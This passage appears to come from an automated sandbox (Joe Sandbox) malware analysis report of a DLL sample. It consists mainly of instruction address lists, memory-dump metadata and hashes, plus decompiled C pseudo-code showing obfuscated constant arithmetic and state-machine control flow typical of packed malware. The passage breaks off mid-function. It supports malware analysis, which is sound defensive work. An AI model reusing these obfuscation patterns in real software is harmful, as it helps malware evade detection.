                                                                                                                                                                            				goto L23;
                                                                                                                                                                            			}





















































                                                                                                                                                                            0x02f64a66
                                                                                                                                                                            0x02f64a6c
                                                                                                                                                                            0x02f64a76
                                                                                                                                                                            0x02f64a7e
                                                                                                                                                                            0x02f64a86
                                                                                                                                                                            0x02f64a88
                                                                                                                                                                            0x02f64a8f
                                                                                                                                                                            0x02f64a97
                                                                                                                                                                            0x02f64aa6
                                                                                                                                                                            0x02f64aab
                                                                                                                                                                            0x02f64ab1
                                                                                                                                                                            0x02f64ab9
                                                                                                                                                                            0x02f64ac1
                                                                                                                                                                            0x02f64ac6
                                                                                                                                                                            0x02f64ac7
                                                                                                                                                                            0x02f64acb
                                                                                                                                                                            0x02f64ad3
                                                                                                                                                                            0x02f64adb
                                                                                                                                                                            0x02f64ae0
                                                                                                                                                                            0x02f64ae8
                                                                                                                                                                            0x02f64af0
                                                                                                                                                                            0x02f64af8
                                                                                                                                                                            0x02f64b00
                                                                                                                                                                            0x02f64b08
                                                                                                                                                                            0x02f64b10
                                                                                                                                                                            0x02f64b18
                                                                                                                                                                            0x02f64b20
                                                                                                                                                                            0x02f64b28
                                                                                                                                                                            0x02f64b30
                                                                                                                                                                            0x02f64b38
                                                                                                                                                                            0x02f64b40
                                                                                                                                                                            0x02f64b48
                                                                                                                                                                            0x02f64b4d
                                                                                                                                                                            0x02f64b55
                                                                                                                                                                            0x02f64b5d
                                                                                                                                                                            0x02f64b65
                                                                                                                                                                            0x02f64b6d
                                                                                                                                                                            0x02f64b75
                                                                                                                                                                            0x02f64b7d
                                                                                                                                                                            0x02f64b85
                                                                                                                                                                            0x02f64b8d
                                                                                                                                                                            0x02f64b95
                                                                                                                                                                            0x02f64b9d
                                                                                                                                                                            0x02f64ba5
                                                                                                                                                                            0x02f64bad
                                                                                                                                                                            0x02f64bb2
                                                                                                                                                                            0x02f64bbf
                                                                                                                                                                            0x02f64bc3
                                                                                                                                                                            0x02f64bcb
                                                                                                                                                                            0x02f64bd3
                                                                                                                                                                            0x02f64bd8
                                                                                                                                                                            0x02f64bdc
                                                                                                                                                                            0x02f64be1
                                                                                                                                                                            0x02f64be9
                                                                                                                                                                            0x02f64bf1
                                                                                                                                                                            0x02f64bf6
                                                                                                                                                                            0x02f64bfe
                                                                                                                                                                            0x02f64c06
                                                                                                                                                                            0x02f64c0e
                                                                                                                                                                            0x02f64c13
                                                                                                                                                                            0x02f64c21
                                                                                                                                                                            0x02f64c25
                                                                                                                                                                            0x02f64c2d
                                                                                                                                                                            0x02f64c35
                                                                                                                                                                            0x02f64c3a
                                                                                                                                                                            0x02f64c42
                                                                                                                                                                            0x02f64c4a
                                                                                                                                                                            0x02f64c57
                                                                                                                                                                            0x02f64c5b
                                                                                                                                                                            0x02f64c65
                                                                                                                                                                            0x02f64c7d
                                                                                                                                                                            0x02f64c82
                                                                                                                                                                            0x02f64c8c
                                                                                                                                                                            0x02f64c91
                                                                                                                                                                            0x02f64c97
                                                                                                                                                                            0x02f64c9f
                                                                                                                                                                            0x02f64ca7
                                                                                                                                                                            0x02f64cac
                                                                                                                                                                            0x02f64caf
                                                                                                                                                                            0x02f64cb3
                                                                                                                                                                            0x02f64cbb
                                                                                                                                                                            0x02f64cc0
                                                                                                                                                                            0x02f64cc8
                                                                                                                                                                            0x02f64cd0
                                                                                                                                                                            0x02f64cd8
                                                                                                                                                                            0x02f64cdd
                                                                                                                                                                            0x02f64ce5
                                                                                                                                                                            0x02f64ced
                                                                                                                                                                            0x02f64cfd
                                                                                                                                                                            0x02f64d01
                                                                                                                                                                            0x02f64d06
                                                                                                                                                                            0x02f64d0e
                                                                                                                                                                            0x02f64d16
                                                                                                                                                                            0x02f64d1e
                                                                                                                                                                            0x02f64d26
                                                                                                                                                                            0x02f64d2e
                                                                                                                                                                            0x02f64d36
                                                                                                                                                                            0x02f64d3e
                                                                                                                                                                            0x02f64d46
                                                                                                                                                                            0x02f64d4b
                                                                                                                                                                            0x02f64d53
                                                                                                                                                                            0x02f64d5b
                                                                                                                                                                            0x02f64d63
                                                                                                                                                                            0x02f64d70
                                                                                                                                                                            0x02f64d73
                                                                                                                                                                            0x02f64d77
                                                                                                                                                                            0x02f64d7f
                                                                                                                                                                            0x02f64d87
                                                                                                                                                                            0x02f64d97
                                                                                                                                                                            0x02f64d9b
                                                                                                                                                                            0x02f64da0
                                                                                                                                                                            0x02f64da8
                                                                                                                                                                            0x02f64db0
                                                                                                                                                                            0x02f64db5
                                                                                                                                                                            0x02f64db6
                                                                                                                                                                            0x02f64dba
                                                                                                                                                                            0x02f64dbf
                                                                                                                                                                            0x02f64dc7
                                                                                                                                                                            0x02f64dcf
                                                                                                                                                                            0x02f64ddd
                                                                                                                                                                            0x02f64de1
                                                                                                                                                                            0x02f64de5
                                                                                                                                                                            0x02f64de5
                                                                                                                                                                            0x02f64ded
                                                                                                                                                                            0x02f64ded
                                                                                                                                                                            0x02f64ded
                                                                                                                                                                            0x02f64ded
                                                                                                                                                                            0x02f64def
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64df5
                                                                                                                                                                            0x02f64e83
                                                                                                                                                                            0x02f64e88
                                                                                                                                                                            0x02f64e6b
                                                                                                                                                                            0x02f64e6b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64e6b
                                                                                                                                                                            0x02f64dfd
                                                                                                                                                                            0x02f64e67
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64e67
                                                                                                                                                                            0x02f64e05
                                                                                                                                                                            0x02f64e57
                                                                                                                                                                            0x02f64e5c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64e5c
                                                                                                                                                                            0x02f64e0d
                                                                                                                                                                            0x02f64f39
                                                                                                                                                                            0x02f64f56
                                                                                                                                                                            0x02f64f5b
                                                                                                                                                                            0x02f64f64
                                                                                                                                                                            0x02f64f68
                                                                                                                                                                            0x02f64f73
                                                                                                                                                                            0x02f64f73
                                                                                                                                                                            0x02f64e19
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64e30
                                                                                                                                                                            0x02f64e35
                                                                                                                                                                            0x02f64e37
                                                                                                                                                                            0x02f64e3c
                                                                                                                                                                            0x02f64e50
                                                                                                                                                                            0x02f64e3e
                                                                                                                                                                            0x02f64e3e
                                                                                                                                                                            0x02f64e46
                                                                                                                                                                            0x02f64e49
                                                                                                                                                                            0x02f64e49
                                                                                                                                                                            0x02f64e3c
                                                                                                                                                                            0x02f64e8d
                                                                                                                                                                            0x02f64e8f
                                                                                                                                                                            0x02f64ef3
                                                                                                                                                                            0x02f64f02
                                                                                                                                                                            0x02f64f07
                                                                                                                                                                            0x02f64f0a
                                                                                                                                                                            0x02f64f0f
                                                                                                                                                                            0x02f64f13
                                                                                                                                                                            0x02f64f14
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64f14
                                                                                                                                                                            0x02f64e91
                                                                                                                                                                            0x02f64e97
                                                                                                                                                                            0x02f64ec0
                                                                                                                                                                            0x02f64ec1
                                                                                                                                                                            0x02f64ec7
                                                                                                                                                                            0x02f64ecc
                                                                                                                                                                            0x02f64ecf
                                                                                                                                                                            0x02f64ed4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64ed4
                                                                                                                                                                            0x02f64e99
                                                                                                                                                                            0x02f64e9f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64ea5
                                                                                                                                                                            0x02f64ea7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64f17
                                                                                                                                                                            0x02f64f17
                                                                                                                                                                            0x02f64f17
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: *-$&6!$*d>$6&Y$7$]MH[
                                                                                                                                                                            • API String ID: 0-1885758756
                                                                                                                                                                            • Opcode ID: cfceb2799091df75c2b64b2e0bc8d4d77df21f0eb1712e419a7920e469372882
                                                                                                                                                                            • Instruction ID: 53fab315b622020cb0d603c27b104c92e1e29331a4752be4585ccc67fc52a7be
                                                                                                                                                                            • Opcode Fuzzy Hash: cfceb2799091df75c2b64b2e0bc8d4d77df21f0eb1712e419a7920e469372882
                                                                                                                                                                            • Instruction Fuzzy Hash: E0D142B15083809FD368DF65D48981BFBE1FBD4798F208A1DF6968A260D3B5C949CF42
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 99%
                                                                                                                                                                            			E02F6CCD9(void* __ecx, void* __edx) {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				void* _t242;
                                                                                                                                                                            				intOrPtr _t243;
                                                                                                                                                                            				intOrPtr _t244;
                                                                                                                                                                            				void* _t248;
                                                                                                                                                                            				signed int _t250;
                                                                                                                                                                            				signed int _t251;
                                                                                                                                                                            				signed int _t252;
                                                                                                                                                                            				signed int _t253;
                                                                                                                                                                            				signed int _t254;
                                                                                                                                                                            				void* _t282;
                                                                                                                                                                            				void* _t283;
                                                                                                                                                                            				signed int _t285;
                                                                                                                                                                            				signed int* _t287;
                                                                                                                                                                            				signed int* _t288;
                                                                                                                                                                            
                                                                                                                                                                            				_t287 =  &_v100;
                                                                                                                                                                            				_v4 = _v4 & 0x00000000;
                                                                                                                                                                            				_v8 = 0x71e8b0;
                                                                                                                                                                            				_v36 = 0x18cf5b;
                                                                                                                                                                            				_v36 = _v36 + 0x6698;
                                                                                                                                                                            				_v36 = _v36 ^ 0x001a117a;
                                                                                                                                                                            				_v60 = 0xa2890;
                                                                                                                                                                            				_t282 = __edx;
                                                                                                                                                                            				_t248 = __ecx;
                                                                                                                                                                            				_t283 = 0x72ed85;
                                                                                                                                                                            				_t250 = 0x42;
                                                                                                                                                                            				_v60 = _v60 / _t250;
                                                                                                                                                                            				_v60 = _v60 ^ 0xe73bacde;
                                                                                                                                                                            				_v60 = _v60 ^ 0xe73fbe74;
                                                                                                                                                                            				_v40 = 0x9c8291;
                                                                                                                                                                            				_t251 = 0x70;
                                                                                                                                                                            				_v40 = _v40 / _t251;
                                                                                                                                                                            				_v40 = _v40 ^ 0x000cc374;
                                                                                                                                                                            				_v64 = 0xa8df6e;
                                                                                                                                                                            				_t252 = 0x66;
                                                                                                                                                                            				_v64 = _v64 * 0x5a;
                                                                                                                                                                            				_v64 = _v64 | 0x6df616d5;
                                                                                                                                                                            				_v64 = _v64 ^ 0x7ff9e958;
                                                                                                                                                                            				_v88 = 0xc174cb;
                                                                                                                                                                            				_v88 = _v88 ^ 0xe7b64a13;
                                                                                                                                                                            				_v88 = _v88 ^ 0xc84137a7;
                                                                                                                                                                            				_v88 = _v88 << 0xc;
                                                                                                                                                                            				_v88 = _v88 ^ 0x60915aca;
                                                                                                                                                                            				_v32 = 0x752193;
                                                                                                                                                                            				_v32 = _v32 * 0x3f;
                                                                                                                                                                            				_v32 = _v32 ^ 0x1cda7702;
                                                                                                                                                                            				_v92 = 0x141833;
                                                                                                                                                                            				_v92 = _v92 + 0xffffc8f8;
                                                                                                                                                                            				_v92 = _v92 + 0xf362;
                                                                                                                                                                            				_v92 = _v92 << 0x10;
                                                                                                                                                                            				_v92 = _v92 ^ 0xd48431d2;
                                                                                                                                                                            				_v96 = 0xc34044;
                                                                                                                                                                            				_v96 = _v96 << 8;
                                                                                                                                                                            				_v96 = _v96 + 0xffff536d;
                                                                                                                                                                            				_v96 = _v96 + 0x5d23;
                                                                                                                                                                            				_v96 = _v96 ^ 0xc334c852;
                                                                                                                                                                            				_v20 = 0x3a6348;
                                                                                                                                                                            				_v20 = _v20 << 0x10;
                                                                                                                                                                            				_v20 = _v20 ^ 0x6343ca6d;
                                                                                                                                                                            				_v56 = 0x49cd71;
                                                                                                                                                                            				_v56 = _v56 ^ 0x72d9145f;
                                                                                                                                                                            				_v56 = _v56 + 0x4f98;
                                                                                                                                                                            				_v56 = _v56 ^ 0x7290366b;
                                                                                                                                                                            				_v24 = 0x3bf83a;
                                                                                                                                                                            				_v24 = _v24 << 9;
                                                                                                                                                                            				_v24 = _v24 ^ 0x77f6a760;
                                                                                                                                                                            				_v28 = 0x632842;
                                                                                                                                                                            				_v28 = _v28 + 0xffffe69b;
                                                                                                                                                                            				_v28 = _v28 ^ 0x006ee443;
                                                                                                                                                                            				_v48 = 0x4b2ed5;
                                                                                                                                                                            				_v48 = _v48 ^ 0x82c7a85b;
                                                                                                                                                                            				_v48 = _v48 + 0xffff7c4b;
                                                                                                                                                                            				_v48 = _v48 ^ 0x8282f052;
                                                                                                                                                                            				_v52 = 0x4c7b52;
                                                                                                                                                                            				_v52 = _v52 + 0xffffbc1f;
                                                                                                                                                                            				_v52 = _v52 + 0x2e12;
                                                                                                                                                                            				_v52 = _v52 ^ 0x004752b1;
                                                                                                                                                                            				_v16 = 0x3a13fc;
                                                                                                                                                                            				_v16 = _v16 / _t252;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00081e0d;
                                                                                                                                                                            				_v84 = 0x8573c6;
                                                                                                                                                                            				_t253 = 0x4b;
                                                                                                                                                                            				_v84 = _v84 / _t253;
                                                                                                                                                                            				_v84 = _v84 | 0x42242f90;
                                                                                                                                                                            				_v84 = _v84 >> 0xc;
                                                                                                                                                                            				_v84 = _v84 ^ 0x00008b33;
                                                                                                                                                                            				_v100 = 0x3509ce;
                                                                                                                                                                            				_t254 = 0x19;
                                                                                                                                                                            				_v100 = _v100 / _t254;
                                                                                                                                                                            				_t285 = 0x44;
                                                                                                                                                                            				_t255 = 0x6f;
                                                                                                                                                                            				_v100 = _v100 * 0x31;
                                                                                                                                                                            				_v100 = _v100 + 0x6b64;
                                                                                                                                                                            				_v100 = _v100 ^ 0x006714bf;
                                                                                                                                                                            				_v68 = 0x65eeb7;
                                                                                                                                                                            				_v68 = _v68 + 0x24bd;
                                                                                                                                                                            				_v68 = _v68 << 7;
                                                                                                                                                                            				_v68 = _v68 ^ 0x330bb4b3;
                                                                                                                                                                            				_v72 = 0x31388d;
                                                                                                                                                                            				_v72 = _v72 * 0x77;
                                                                                                                                                                            				_v72 = _v72 / _t285;
                                                                                                                                                                            				_v72 = _v72 ^ 0x00560572;
                                                                                                                                                                            				_v76 = 0x10ecc2;
                                                                                                                                                                            				_v76 = _v76 | 0x28471304;
                                                                                                                                                                            				_v76 = _v76 + 0xcdda;
                                                                                                                                                                            				_v76 = _v76 ^ 0x285661a5;
                                                                                                                                                                            				_v44 = 0xf32c83;
                                                                                                                                                                            				_v44 = _v44 / _t255;
                                                                                                                                                                            				_v44 = _v44 / _t285;
                                                                                                                                                                            				_v44 = _v44 ^ 0x000ff213;
                                                                                                                                                                            				_v80 = 0xb9f4a0;
                                                                                                                                                                            				_v80 = _v80 << 0xa;
                                                                                                                                                                            				_v80 = _v80 + 0xd38f;
                                                                                                                                                                            				_v80 = _v80 >> 8;
                                                                                                                                                                            				_v80 = _v80 ^ 0x00ede5ae;
                                                                                                                                                                            				_v12 = 0x138f30;
                                                                                                                                                                            				_v12 = _v12 ^ 0xf49e1969;
                                                                                                                                                                            				_v12 = _v12 ^ 0xf48aec3a;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t242 = 0xd8fe181;
                                                                                                                                                                            					do {
                                                                                                                                                                            						L2:
                                                                                                                                                                            						while(_t283 != 0x72ed85) {
                                                                                                                                                                            							if(_t283 == 0xb6c7232) {
                                                                                                                                                                            								_t278 = _v52;
                                                                                                                                                                            								_t255 = _v48;
                                                                                                                                                                            								_t243 = E02F71005(_v48, _v52, _v16, _v84,  *((intOrPtr*)(_t282 + 0x38)));
                                                                                                                                                                            								_t287 =  &(_t287[3]);
                                                                                                                                                                            								 *((intOrPtr*)(_t282 + 0x2c)) = _t243;
                                                                                                                                                                            								__eflags = _t243;
                                                                                                                                                                            								_t242 = 0xd8fe181;
                                                                                                                                                                            								_t283 =  !=  ? 0xd8fe181 : 0xd6f812a;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t283 == 0xc5020c9) {
                                                                                                                                                                            								_push(_v64);
                                                                                                                                                                            								_t244 = E02F73263(_v36, _v60, __eflags, _t248, _v40, _t255);
                                                                                                                                                                            								_t288 =  &(_t287[4]);
                                                                                                                                                                            								 *((intOrPtr*)(_t282 + 0x38)) = _t244;
                                                                                                                                                                            								__eflags = _t244;
                                                                                                                                                                            								if(_t244 != 0) {
                                                                                                                                                                            									E02F7148A(_t244, _t244, _v88, _v32, _v92, _v96);
                                                                                                                                                                            									_t278 = _v56;
                                                                                                                                                                            									_t255 = _v20;
                                                                                                                                                                            									E02F5E2BD(_v56, _v24,  *((intOrPtr*)(_t282 + 0x38)), _v28);
                                                                                                                                                                            									_t287 =  &(_t288[7]);
                                                                                                                                                                            									_t283 = 0xb6c7232;
                                                                                                                                                                            									goto L1;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t283 == 0xd6f812a) {
                                                                                                                                                                            									return E02F5F0E9(_v44,  *((intOrPtr*)(_t282 + 0x38)), _v80, _v12);
                                                                                                                                                                            								}
                                                                                                                                                                            								if(_t283 != _t242) {
                                                                                                                                                                            									goto L13;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t244 = E02F60EBC(_v100, _t278, _v68, _v100, _v72, _v76, _v100, _t255, _t282, E02F725F1);
                                                                                                                                                                            									_t287 =  &(_t287[8]);
                                                                                                                                                                            									 *((intOrPtr*)(_t282 + 0x48)) = _t244;
                                                                                                                                                                            									if(_t244 == 0) {
                                                                                                                                                                            										_t283 = 0xd6f812a;
                                                                                                                                                                            										while(1) {
                                                                                                                                                                            											L1:
                                                                                                                                                                            											_t242 = 0xd8fe181;
                                                                                                                                                                            											goto L2;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							return _t244;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t283 = 0xc5020c9;
                                                                                                                                                                            						L13:
                                                                                                                                                                            						__eflags = _t283 - 0x11d9bb5;
                                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                                            					return _t242;
                                                                                                                                                                            				}
                                                                                                                                                                            			}










































                                                                                                                                                                            0x02f6ccd9
                                                                                                                                                                            0x02f6ccdc
                                                                                                                                                                            0x02f6cce1
                                                                                                                                                                            0x02f6cce9
                                                                                                                                                                            0x02f6ccf1
                                                                                                                                                                            0x02f6ccf9
                                                                                                                                                                            0x02f6cd01
                                                                                                                                                                            0x02f6cd11
                                                                                                                                                                            0x02f6cd13
                                                                                                                                                                            0x02f6cd19
                                                                                                                                                                            0x02f6cd1e
                                                                                                                                                                            0x02f6cd23
                                                                                                                                                                            0x02f6cd29
                                                                                                                                                                            0x02f6cd31
                                                                                                                                                                            0x02f6cd39
                                                                                                                                                                            0x02f6cd45
                                                                                                                                                                            0x02f6cd4a
                                                                                                                                                                            0x02f6cd50
                                                                                                                                                                            0x02f6cd58
                                                                                                                                                                            0x02f6cd65
                                                                                                                                                                            0x02f6cd66
                                                                                                                                                                            0x02f6cd6a
                                                                                                                                                                            0x02f6cd72
                                                                                                                                                                            0x02f6cd7a
                                                                                                                                                                            0x02f6cd82
                                                                                                                                                                            0x02f6cd8a
                                                                                                                                                                            0x02f6cd92
                                                                                                                                                                            0x02f6cd97
                                                                                                                                                                            0x02f6cd9f
                                                                                                                                                                            0x02f6cdac
                                                                                                                                                                            0x02f6cdb0
                                                                                                                                                                            0x02f6cdb8
                                                                                                                                                                            0x02f6cdc0
                                                                                                                                                                            0x02f6cdc8
                                                                                                                                                                            0x02f6cdd0
                                                                                                                                                                            0x02f6cdd5
                                                                                                                                                                            0x02f6cddd
                                                                                                                                                                            0x02f6cde5
                                                                                                                                                                            0x02f6cdea
                                                                                                                                                                            0x02f6cdf2
                                                                                                                                                                            0x02f6cdfa
                                                                                                                                                                            0x02f6ce02
                                                                                                                                                                            0x02f6ce0a
                                                                                                                                                                            0x02f6ce0f
                                                                                                                                                                            0x02f6ce17
                                                                                                                                                                            0x02f6ce1f
                                                                                                                                                                            0x02f6ce27
                                                                                                                                                                            0x02f6ce2f
                                                                                                                                                                            0x02f6ce37
                                                                                                                                                                            0x02f6ce3f
                                                                                                                                                                            0x02f6ce44
                                                                                                                                                                            0x02f6ce4c
                                                                                                                                                                            0x02f6ce54
                                                                                                                                                                            0x02f6ce5c
                                                                                                                                                                            0x02f6ce64
                                                                                                                                                                            0x02f6ce6c
                                                                                                                                                                            0x02f6ce74
                                                                                                                                                                            0x02f6ce7c
                                                                                                                                                                            0x02f6ce84
                                                                                                                                                                            0x02f6ce8c
                                                                                                                                                                            0x02f6ce94
                                                                                                                                                                            0x02f6ce9c
                                                                                                                                                                            0x02f6cea4
                                                                                                                                                                            0x02f6ceb2
                                                                                                                                                                            0x02f6ceb6
                                                                                                                                                                            0x02f6cec0
                                                                                                                                                                            0x02f6cece
                                                                                                                                                                            0x02f6ced3
                                                                                                                                                                            0x02f6ced7
                                                                                                                                                                            0x02f6cedf
                                                                                                                                                                            0x02f6cee4
                                                                                                                                                                            0x02f6ceec
                                                                                                                                                                            0x02f6cefa
                                                                                                                                                                            0x02f6ceff
                                                                                                                                                                            0x02f6cf0a
                                                                                                                                                                            0x02f6cf0d
                                                                                                                                                                            0x02f6cf0e
                                                                                                                                                                            0x02f6cf12
                                                                                                                                                                            0x02f6cf1a
                                                                                                                                                                            0x02f6cf22
                                                                                                                                                                            0x02f6cf2a
                                                                                                                                                                            0x02f6cf32
                                                                                                                                                                            0x02f6cf37
                                                                                                                                                                            0x02f6cf3f
                                                                                                                                                                            0x02f6cf4c
                                                                                                                                                                            0x02f6cf58
                                                                                                                                                                            0x02f6cf5c
                                                                                                                                                                            0x02f6cf64
                                                                                                                                                                            0x02f6cf6c
                                                                                                                                                                            0x02f6cf74
                                                                                                                                                                            0x02f6cf7c
                                                                                                                                                                            0x02f6cf84
                                                                                                                                                                            0x02f6cf94
                                                                                                                                                                            0x02f6cfa3
                                                                                                                                                                            0x02f6cfa7
                                                                                                                                                                            0x02f6cfaf
                                                                                                                                                                            0x02f6cfb7
                                                                                                                                                                            0x02f6cfbc
                                                                                                                                                                            0x02f6cfc4
                                                                                                                                                                            0x02f6cfc9
                                                                                                                                                                            0x02f6cfd1
                                                                                                                                                                            0x02f6cfd9
                                                                                                                                                                            0x02f6cfe1
                                                                                                                                                                            0x02f6cfe9
                                                                                                                                                                            0x02f6cfe9
                                                                                                                                                                            0x02f6cfe9
                                                                                                                                                                            0x02f6cfee
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6cfee
                                                                                                                                                                            0x02f6d000
                                                                                                                                                                            0x02f6d0bc
                                                                                                                                                                            0x02f6d0c0
                                                                                                                                                                            0x02f6d0c4
                                                                                                                                                                            0x02f6d0c9
                                                                                                                                                                            0x02f6d0cc
                                                                                                                                                                            0x02f6d0cf
                                                                                                                                                                            0x02f6d0d3
                                                                                                                                                                            0x02f6d0d8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d0d8
                                                                                                                                                                            0x02f6d00c
                                                                                                                                                                            0x02f6d04e
                                                                                                                                                                            0x02f6d060
                                                                                                                                                                            0x02f6d065
                                                                                                                                                                            0x02f6d068
                                                                                                                                                                            0x02f6d06b
                                                                                                                                                                            0x02f6d06d
                                                                                                                                                                            0x02f6d087
                                                                                                                                                                            0x02f6d097
                                                                                                                                                                            0x02f6d09b
                                                                                                                                                                            0x02f6d09f
                                                                                                                                                                            0x02f6d0a4
                                                                                                                                                                            0x02f6d0a7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d0a7
                                                                                                                                                                            0x02f6d00e
                                                                                                                                                                            0x02f6d010
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d108
                                                                                                                                                                            0x02f6d018
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d01e
                                                                                                                                                                            0x02f6d037
                                                                                                                                                                            0x02f6d03c
                                                                                                                                                                            0x02f6d03f
                                                                                                                                                                            0x02f6d044
                                                                                                                                                                            0x02f6d04a
                                                                                                                                                                            0x02f6cfe9
                                                                                                                                                                            0x02f6cfe9
                                                                                                                                                                            0x02f6cfe9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6cfe9
                                                                                                                                                                            0x02f6cfe9
                                                                                                                                                                            0x02f6d044
                                                                                                                                                                            0x02f6d018
                                                                                                                                                                            0x02f6d110
                                                                                                                                                                            0x02f6d110
                                                                                                                                                                            0x02f6d0e0
                                                                                                                                                                            0x02f6d0e5
                                                                                                                                                                            0x02f6d0e5
                                                                                                                                                                            0x02f6d0e5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6cfee

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: #]$$P$Cn$Hc:$R{L$dk
                                                                                                                                                                            • API String ID: 0-1551317889
                                                                                                                                                                            • Opcode ID: 8fa57dd15f99626e059c7b5af12db167e3d010da234c1688ec1f38541ae64c21
                                                                                                                                                                            • Instruction ID: e2d1b0f0526aea1c5e291ce2cbe33535aad1305d3867cb16629233f9bb4e45b4
                                                                                                                                                                            • Opcode Fuzzy Hash: 8fa57dd15f99626e059c7b5af12db167e3d010da234c1688ec1f38541ae64c21
                                                                                                                                                                            • Instruction Fuzzy Hash: 6FB133B29083419FD358CF25C54941BFBE2FBC8788F108A2DF69996260D7B5C949CF86
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                            			E02F5F369(void* __ecx) {
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				unsigned int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				void* _t198;
                                                                                                                                                                            				void* _t199;
                                                                                                                                                                            				void* _t202;
                                                                                                                                                                            				void* _t207;
                                                                                                                                                                            				void* _t210;
                                                                                                                                                                            				void* _t213;
                                                                                                                                                                            				void* _t214;
                                                                                                                                                                            				void* _t216;
                                                                                                                                                                            				signed int _t234;
                                                                                                                                                                            				signed int _t235;
                                                                                                                                                                            				signed int _t236;
                                                                                                                                                                            				signed int _t237;
                                                                                                                                                                            				signed int _t238;
                                                                                                                                                                            				signed int _t239;
                                                                                                                                                                            				void* _t241;
                                                                                                                                                                            				signed int* _t243;
                                                                                                                                                                            				void* _t246;
                                                                                                                                                                            
                                                                                                                                                                            				_t243 =  &_v88;
                                                                                                                                                                            				_v16 = 0x3949c2;
                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                            				_t214 = __ecx;
                                                                                                                                                                            				_t241 = 0;
                                                                                                                                                                            				_t216 = 0x68b8c0f;
                                                                                                                                                                            				asm("stosd");
